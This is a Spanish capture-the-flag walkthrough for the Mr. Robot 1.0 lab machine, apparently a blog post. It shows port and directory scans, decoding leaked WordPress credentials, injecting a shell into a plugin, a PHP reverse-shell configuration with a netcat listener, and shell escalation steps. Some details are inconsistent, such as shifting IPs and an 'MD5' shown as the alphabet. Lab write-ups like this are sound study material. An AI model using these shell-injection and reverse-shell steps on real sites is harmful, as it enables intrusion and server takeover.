MR ROBOT 1.0

Bueno MR. ROBOT un CTF armado con muchas respuesta de una de las series en el cual no soy fans de esa serie pero nuestro objetivo es encontrar una key.

Estuve escaneando sus puertos y nos muestra el puerto 443, 80 abierto entonces mi idea fue que puede ser que este montado un servidor web. En el cual hice una búsqueda de directorio con DIRB y me arrojo un wordpress.

nmap -sV -sC 192.168.1.7
dirb http://192.168.1.7
No me quede tan feliz que le hice un escaneo con nikto
nikto -h 192.168.1.7 -p 443
nikto -h 192.168.1.7 
Pero con Nikto tuve mucha suerte.
Encontramos útil.
http://192.168.1.7/robots.txt
Buscamos el directorio con el diccionario
wfuzz -w /root/Downloads/fsocity.dic --sc=200 http://192.168.1.7/FUZZ 
Ahora cuando encontramos "license" Vamos a decodificar esta codificación base64.
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
Si tienes problemas en decodificar puedes hacer online. Pincha Aquí.
Ahora iniciamos sesión a wordpress y vamos a modificar o inyectar tu shell en un plugin.

Inyectamos nuestra shell por ejemplo en PLUGIN HELLO.php
http://192.168.1.5/wp-content/plugins/hello.php
Sino sabes las ubicaciones puedes usar
wpscan -u 192.168.1.5 --enumerate p
Ahora encontramos una KEY
robot:c3fcd3d76192e4007dfb496cca67e13b
Desciframos MD5
robot:c3fcd3d76192e4007dfb496cca67e13b
MD5 = abcdefghijklmnopqrstuvwxyz
Luego editamos un index.php para ejecutar nuestra php reverse. Y lo editamos y copiamos el siguiente código
  Modificamos esta parte del código

$ip = '192.168.1.3';  // CHANGE THIS
$port = 6663;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = '/bin/sh -i';
$daemon = 0;
$debug = 0;
Y ejecutamos en la terminal
nc -lvp 6663
Mientras que también abrimos la URL. Recuerda siempre el puerto para hacer el reverse. Luego corremos nuestro reverse a python
python -c 'import pty;pty.spawn("/bin/bash");'
su robot
Ahora te pide la contraseña pero como anteriormente desciframos un MD5 robot:XXXX Listo, ingresamos en modo root
cat key-2-of-3.txt
KEY : 822c73956184f694993bede3eb39f959
 LISTO CREADPAG he terminado el CTF. Espero haberte dado una idea. Recuerda hay cosas que puedes crearte.

Comments

Popular Posts